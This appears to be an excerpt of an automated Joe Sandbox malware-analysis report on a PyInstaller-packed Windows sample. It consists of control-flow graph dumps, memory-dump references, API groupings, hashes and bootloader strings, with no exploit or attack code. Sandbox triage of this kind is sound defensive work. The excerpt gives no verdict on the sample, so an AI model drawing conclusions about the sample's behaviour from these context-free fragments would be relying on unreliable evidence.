                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DC2E960B08B1396FB109FA6F8507AD2794AF47FD1F865435CA0E86660DF6DE188C31B
                                                                                                                                                                                                                              Function 00007FF7EAD01000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1205 7ff7ead01000-7ff7ead03806 call 7ff7ead0fe18 call 7ff7ead0fe20 call 7ff7ead0c850 call 7ff7ead153f0 call 7ff7ead15484 call 7ff7ead036b0 1219 7ff7ead03814-7ff7ead03836 call 7ff7ead01950 1205->1219 1220 7ff7ead03808-7ff7ead0380f 1205->1220 1226 7ff7ead0383c-7ff7ead03856 call 7ff7ead01c80 1219->1226 1227 7ff7ead0391b-7ff7ead03931 call 7ff7ead045c0 1219->1227 1221 7ff7ead03c97-7ff7ead03cb2 call 7ff7ead0c550 1220->1221 1231 7ff7ead0385b-7ff7ead0389b call 7ff7ead08830 1226->1231 1233 7ff7ead03933-7ff7ead03960 call 7ff7ead07f90 1227->1233 1234 7ff7ead0396a-7ff7ead0397f call 7ff7ead02710 1227->1234 1238 7ff7ead038c1-7ff7ead038cc call 7ff7ead14f30 1231->1238 1239 7ff7ead0389d-7ff7ead038a3 1231->1239 1245 7ff7ead03984-7ff7ead039a6 call 7ff7ead01c80 1233->1245 1246 7ff7ead03962-7ff7ead03965 call 7ff7ead1004c 1233->1246 1247 7ff7ead03c8f 1234->1247 1254 7ff7ead038d2-7ff7ead038e1 call 7ff7ead08830 1238->1254 1255 7ff7ead039fc-7ff7ead03a2a call 7ff7ead08940 call 7ff7ead089a0 * 3 1238->1255 1242 7ff7ead038a5-7ff7ead038ad 1239->1242 1243 7ff7ead038af-7ff7ead038bd call 7ff7ead089a0 1239->1243 1242->1243 1243->1238 1256 7ff7ead039b0-7ff7ead039b9 1245->1256 1246->1234 1247->1221 1263 7ff7ead039f4-7ff7ead039f7 call 7ff7ead14f30 1254->1263 1264 7ff7ead038e7-7ff7ead038ed 1254->1264 1280 7ff7ead03a2f-7ff7ead03a3e call 7ff7ead08830 1255->1280 1256->1256 1259 7ff7ead039bb-7ff7ead039d8 call 7ff7ead01950 1256->1259 1259->1231 1271 7ff7ead039de-7ff7ead039ef call 7ff7ead02710 1259->1271 1263->1255 1268 7ff7ead038f0-7ff7ead038fc 1264->1268 1272 7ff7ead03905-7ff7ead03908 1268->1272 1273 7ff7ead038fe-7ff7ead03903 1268->1273 1271->1247 1272->1263 1275 7ff7ead0390e-7ff7ead03916 call 7ff7ead14f30 1272->1275 1273->1268 1273->1272 1275->1280 1284 7ff7ead03b45-7ff7ead03b53 1280->1284 1285 7ff7ead03a44-7ff7ead03a47 1280->1285 1286 7ff7ead03b59-7ff7ead03b5d 1284->1286 1287 7ff7ead03a67 1284->1287 1285->1284 1288 7ff7ead03a4d-7ff7ead03a50 1285->1288 1289 7ff7ead03a6b-7ff7ead03a90 call 7ff7ead14f30 1286->1289 1287->1289 1290 7ff7ead03a56-7ff7ead03a5a 1288->1290 1291 7ff7ead03b14-7ff7ead03b17 1288->1291 1300 7ff7ead03a92-7ff7ead03aa6 call 7ff7ead08940 1289->1300 1301 7ff7ead03aab-7ff7ead03ac0 1289->1301 1290->1291 1292 7ff7ead03a60 1290->1292 1293 7ff7ead03b2f-7ff7ead03b40 call 7ff7ead02710 1291->1293 1294 7ff7ead03b19-7ff7ead03b1d 1291->1294 1292->1287 1304 7ff7ead03c7f-7ff7ead03c87 1293->1304 1294->1293 1296 7ff7ead03b1f-7ff7ead03b2a 1294->1296 1296->1289 1300->1301 1302 7ff7ead03ac6-7ff7ead03aca 1301->1302 1303 7ff7ead03be8-7ff7ead03bfa call 7ff7ead08830 1301->1303 1307 7ff7ead03ad0-7ff7ead03ae8 call 7ff7ead15250 1302->1307 1308 7ff7ead03bcd-7ff7ead03be2 call 7ff7ead01940 1302->1308 1312 7ff7ead03c2e 1303->1312 1313 7ff7ead03bfc-7ff7ead03c02 1303->1313 1304->1247 1318 7ff7ead03b62-7ff7ead03b7a call 7ff7ead15250 1307->1318 1319 7ff7ead03aea-7ff7ead03b02 call 7ff7ead15250 1307->1319 1308->1302 1308->1303 1320 7ff7ead03c31-7ff7ead03c40 call 7ff7ead14f30 1312->1320 1316 7ff7ead03c04-7ff7ead03c1c 1313->1316 1317 7ff7ead03c1e-7ff7ead03c2c 1313->1317 1316->1320 1317->1320 1327 7ff7ead03b7c-7ff7ead03b80 1318->1327 1328 7ff7ead03b87-7ff7ead03b9f call 7ff7ead15250 1318->1328 1319->1308 1329 7ff7ead03b08-7ff7ead03b0f 1319->1329 1330 7ff7ead03c46-7ff7ead03c4a 1320->1330 1331 7ff7ead03d41-7ff7ead03d63 call 7ff7ead044e0 1320->1331 1327->1328 1340 7ff7ead03ba1-7ff7ead03ba5 1328->1340 1341 7ff7ead03bac-7ff7ead03bc4 call 7ff7ead15250 1328->1341 1329->1308 1333 7ff7ead03cd4-7ff7ead03ce6 call 7ff7ead08830 1330->1333 1334 7ff7ead03c50-7ff7ead03c5f call 7ff7ead090e0 1330->1334 1344 7ff7ead03d65-7ff7ead03d6f call 7ff7ead04630 1331->1344 1345 7ff7ead03d71-7ff7ead03d82 call 7ff7ead01c80 1331->1345 1351 7ff7ead03d35-7ff7ead03d3c 1333->1351 1352 7ff7ead03ce8-7ff7ead03ceb 1333->1352 1349 7ff7ead03cb3-7ff7ead03cbd call 7ff7ead08660 1334->1349 1350 7ff7ead03c61 1334->1350 1340->1341 1341->1308 1364 7ff7ead03bc6 1341->1364 1355 7ff7ead03d87-7ff7ead03d96 1344->1355 1345->1355 1369 7ff7ead03cbf-7ff7ead03cc6 1349->1369 1370 7ff7ead03cc8-7ff7ead03ccf 1349->1370 1358 7ff7ead03c68 call 7ff7ead02710 1350->1358 1351->1358 1352->1351 1353 7ff7ead03ced-7ff7ead03d10 call 7ff7ead01c80 1352->1353 1371 7ff7ead03d12-7ff7ead03d26 call 7ff7ead02710 call 7ff7ead14f30 1353->1371 1372 7ff7ead03d2b-7ff7ead03d33 call 7ff7ead14f30 1353->1372 1361 7ff7ead03dc4-7ff7ead03dda call 7ff7ead09390 1355->1361 1362 7ff7ead03d98-7ff7ead03d9f 1355->1362 1365 7ff7ead03c6d-7ff7ead03c77 1358->1365 1377 7ff7ead03ddc 1361->1377 1378 7ff7ead03de8-7ff7ead03e04 SetDllDirectoryW 1361->1378 1362->1361 1367 7ff7ead03da1-7ff7ead03da5 1362->1367 1364->1308 1365->1304 1367->1361 1373 7ff7ead03da7-7ff7ead03dbe SetDllDirectoryW LoadLibraryExW 1367->1373 1369->1358 1370->1355 1371->1365 1372->1355 1373->1361 1377->1378 1381 7ff7ead03f01-7ff7ead03f08 1378->1381 1382 7ff7ead03e0a-7ff7ead03e19 call 7ff7ead08830 1378->1382 1384 7ff7ead03f0e-7ff7ead03f15 1381->1384 1385 7ff7ead04008-7ff7ead04010 1381->1385 1392 7ff7ead03e32-7ff7ead03e3c call 7ff7ead14f30 1382->1392 1393 7ff7ead03e1b-7ff7ead03e21 1382->1393 1384->1385 1389 7ff7ead03f1b-7ff7ead03f25 call 7ff7ead033c0 1384->1389 1390 7ff7ead04035-7ff7ead04040 call 7ff7ead036a0 call 7ff7ead03360 1385->1390 1391 7ff7ead04012-7ff7ead0402f PostMessageW GetMessageW 1385->1391 1389->1365 1403 7ff7ead03f2b-7ff7ead03f3f call 7ff7ead090c0 1389->1403 1404 7ff7ead04045-7ff7ead04067 call 7ff7ead03670 call 7ff7ead06fc0 call 7ff7ead06d70 1390->1404 1391->1390 1405 7ff7ead03ef2-7ff7ead03efc call 7ff7ead08940 1392->1405 1406 7ff7ead03e42-7ff7ead03e48 1392->1406 1397 7ff7ead03e23-7ff7ead03e2b 1393->1397 1398 7ff7ead03e2d-7ff7ead03e2f 1393->1398 1397->1398 1398->1392 1412 7ff7ead03f64-7ff7ead03fa7 call 7ff7ead08940 call 7ff7ead089e0 call 7ff7ead06fc0 call 7ff7ead06d70 call 7ff7ead088e0 1403->1412 1413 7ff7ead03f41-7ff7ead03f5e PostMessageW GetMessageW 1403->1413 1405->1381 1406->1405 1410 7ff7ead03e4e-7ff7ead03e54 1406->1410 1415 7ff7ead03e56-7ff7ead03e58 1410->1415 1416 7ff7ead03e5f-7ff7ead03e61 1410->1416 1454 7ff7ead03ff5-7ff7ead04003 call 7ff7ead01900 1412->1454 1455 7ff7ead03fa9-7ff7ead03fbf call 7ff7ead08ed0 call 7ff7ead088e0 1412->1455 1413->1412 1419 7ff7ead03e5a 1415->1419 1420 7ff7ead03e67-7ff7ead03e83 call 7ff7ead06dc0 call 7ff7ead07340 1415->1420 1416->1381 1416->1420 1419->1381 1432 7ff7ead03e85-7ff7ead03e8c 1420->1432 1433 7ff7ead03e8e-7ff7ead03e95 1420->1433 1435 7ff7ead03edb-7ff7ead03ef0 call 7ff7ead02a50 call 7ff7ead06fc0 call 7ff7ead06d70 1432->1435 1436 7ff7ead03eaf-7ff7ead03eb9 call 7ff7ead071b0 1433->1436 1437 7ff7ead03e97-7ff7ead03ea4 call 7ff7ead06e00 1433->1437 1435->1381 1449 7ff7ead03ec4-7ff7ead03ed2 call 7ff7ead074f0 1436->1449 1450 7ff7ead03ebb-7ff7ead03ec2 1436->1450 1437->1436 1448 7ff7ead03ea6-7ff7ead03ead 1437->1448 1448->1435 1449->1381 1462 7ff7ead03ed4 1449->1462 1450->1435 1454->1365 1455->1454 1466 7ff7ead03fc1-7ff7ead03fd6 1455->1466 1462->1435 1467 7ff7ead03ff0 call 7ff7ead02a50 1466->1467 1468 7ff7ead03fd8-7ff7ead03feb call 7ff7ead02710 call 7ff7ead01900 1466->1468 1467->1454 1468->1365
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                              • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                              • Opcode ID: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
                                                                                                                                                                                                                              • Instruction ID: 1110fc5f604bc3514105ae1ad6e894e3176ad781bc1424d71341d14022e255bb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9327C21A08A8291FB19F72594943F9A762EF54788FC440B7DA5D432CAEF7CE558C332
                                                                                                                                                                                                                              Function 00007FF7EAD26964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1839 7ff7ead26964-7ff7ead269d7 call 7ff7ead26698 1842 7ff7ead269d9-7ff7ead269e2 call 7ff7ead14ee8 1839->1842 1843 7ff7ead269f1-7ff7ead269fb call 7ff7ead18520 1839->1843 1848 7ff7ead269e5-7ff7ead269ec call 7ff7ead14f08 1842->1848 1849 7ff7ead269fd-7ff7ead26a14 call 7ff7ead14ee8 call 7ff7ead14f08 1843->1849 1850 7ff7ead26a16-7ff7ead26a7f CreateFileW 1843->1850 1865 7ff7ead26d32-7ff7ead26d52 1848->1865 1849->1848 1851 7ff7ead26afc-7ff7ead26b07 GetFileType 1850->1851 1852 7ff7ead26a81-7ff7ead26a87 1850->1852 1858 7ff7ead26b5a-7ff7ead26b61 1851->1858 1859 7ff7ead26b09-7ff7ead26b44 GetLastError call 7ff7ead14e7c CloseHandle 1851->1859 1855 7ff7ead26ac9-7ff7ead26af7 GetLastError call 7ff7ead14e7c 1852->1855 1856 7ff7ead26a89-7ff7ead26a8d 1852->1856 1855->1848 1856->1855 1863 7ff7ead26a8f-7ff7ead26ac7 CreateFileW 1856->1863 1861 7ff7ead26b69-7ff7ead26b6c 1858->1861 1862 7ff7ead26b63-7ff7ead26b67 1858->1862 1859->1848 1874 7ff7ead26b4a-7ff7ead26b55 call 7ff7ead14f08 1859->1874 1869 7ff7ead26b72-7ff7ead26bc7 call 7ff7ead18438 1861->1869 1870 7ff7ead26b6e 1861->1870 1862->1869 1863->1851 1863->1855 1877 7ff7ead26bc9-7ff7ead26bd5 call 7ff7ead268a0 1869->1877 1878 7ff7ead26be6-7ff7ead26c17 call 7ff7ead26418 1869->1878 1870->1869 1874->1848 1877->1878 1886 7ff7ead26bd7 1877->1886 1884 7ff7ead26c19-7ff7ead26c1b 1878->1884 1885 7ff7ead26c1d-7ff7ead26c5f 1878->1885 1887 7ff7ead26bd9-7ff7ead26be1 call 7ff7ead1aac0 1884->1887 1888 7ff7ead26c81-7ff7ead26c8c 1885->1888 1889 7ff7ead26c61-7ff7ead26c65 1885->1889 1886->1887 1887->1865 1891 7ff7ead26d30 1888->1891 1892 7ff7ead26c92-7ff7ead26c96 1888->1892 1889->1888 1890 7ff7ead26c67-7ff7ead26c7c 1889->1890 1890->1888 1891->1865 1892->1891 1894 7ff7ead26c9c-7ff7ead26ce1 CloseHandle CreateFileW 1892->1894 1896 7ff7ead26ce3-7ff7ead26d11 GetLastError call 7ff7ead14e7c call 7ff7ead18660 1894->1896 1897 7ff7ead26d16-7ff7ead26d2b 1894->1897 1896->1897 1897->1891
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                              • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                              • Instruction ID: f9aed6a51e478cb4b00645d73990b07bc78f0d13bd230059b6e4c11a6b0e5bdb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DC1D036B28B4285FB10EF64C4906AC7761F749B98F8142B6DE2E97398CF38D111C321
                                                                                                                                                                                                                              Function 00007FF8E6C89060 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 850librarymemoryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1474223714.00007FF8E6C89000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FF8E6780000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469350124.00007FF8E6780000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E6781000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E6792000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E67A2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E67A8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E67F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E6807000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E6817000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E681E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E682C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E6A0E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E6AF9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E6AFB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E6B32000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E6B6F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E6BCA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E6C3B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E6C70000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469630464.00007FF8E6C83000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474254395.00007FF8E6C8A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e6780000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID: )tP
                                                                                                                                                                                                                              • API String ID: 3300690313-3907340667
                                                                                                                                                                                                                              • Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                              • Instruction ID: 1d0b111dc5e7b371c3a51797a1b707c7610ec9137acd374e087f5b1a5248d248
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E262F36262859286E7298E7CE4003BD77A0F7487C5F045532EA9EC77C4EA7CFA45CB02
                                                                                                                                                                                                                              Function 00007FF8E75333C0 Relevance: 6.9, APIs: 4, Instructions: 900librarymemoryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1488276484.00007FF8E7533000.00000080.00000001.01000000.00000004.sdmp, Offset: 00007FF8E6EE0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474290394.00007FF8E6EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E6EE1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E71B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E71C5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E71CF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E7211000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E72E0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E72E8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E73EB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E73EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E7436000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E743E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E747F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E74B3000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E74DD000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E74F2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1474323542.00007FF8E752C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488411064.00007FF8E7535000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e6ee0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3300690313-0
                                                                                                                                                                                                                              • Opcode ID: 248494c49456e9061dd29398c4c192e6d920701940ac97edae2a832ef171e598
                                                                                                                                                                                                                              • Instruction ID: afe4e88a0c68e409f920016b234c66c1caa4b616ddfeba167d62b49d52dd9b0a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 248494c49456e9061dd29398c4c192e6d920701940ac97edae2a832ef171e598
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B62496262819297E7158F78D80037D77A0F748BC5F445635EAAEC37E8EA3CEA45C701
                                                                                                                                                                                                                              Function 00007FF8E81471D0 Relevance: 6.9, APIs: 4, Instructions: 889librarymemoryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3300690313-0
                                                                                                                                                                                                                              • Opcode ID: 05417be8f1839d801782f9c781979d9678e7c982b20de61a62ff485c284467e9
                                                                                                                                                                                                                              • Instruction ID: 859cf0204132fb28497458200b37ed980035cb7eb1d6f78409288bd25d94eafe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05417be8f1839d801782f9c781979d9678e7c982b20de61a62ff485c284467e9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E62027262829A86E7198A78D4003BD77A0F7487C5F145932EA9EC37C4EB7CEA45CB05
                                                                                                                                                                                                                              Function 00007FF8E7A10350 Relevance: 6.9, APIs: 4, Instructions: 885librarymemoryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1489614277.00007FF8E7A10000.00000080.00000001.01000000.00000013.sdmp, Offset: 00007FF8E7960000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488485527.00007FF8E7960000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7961000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79AA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79B8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489734191.00007FF8E7A12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7960000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3300690313-0
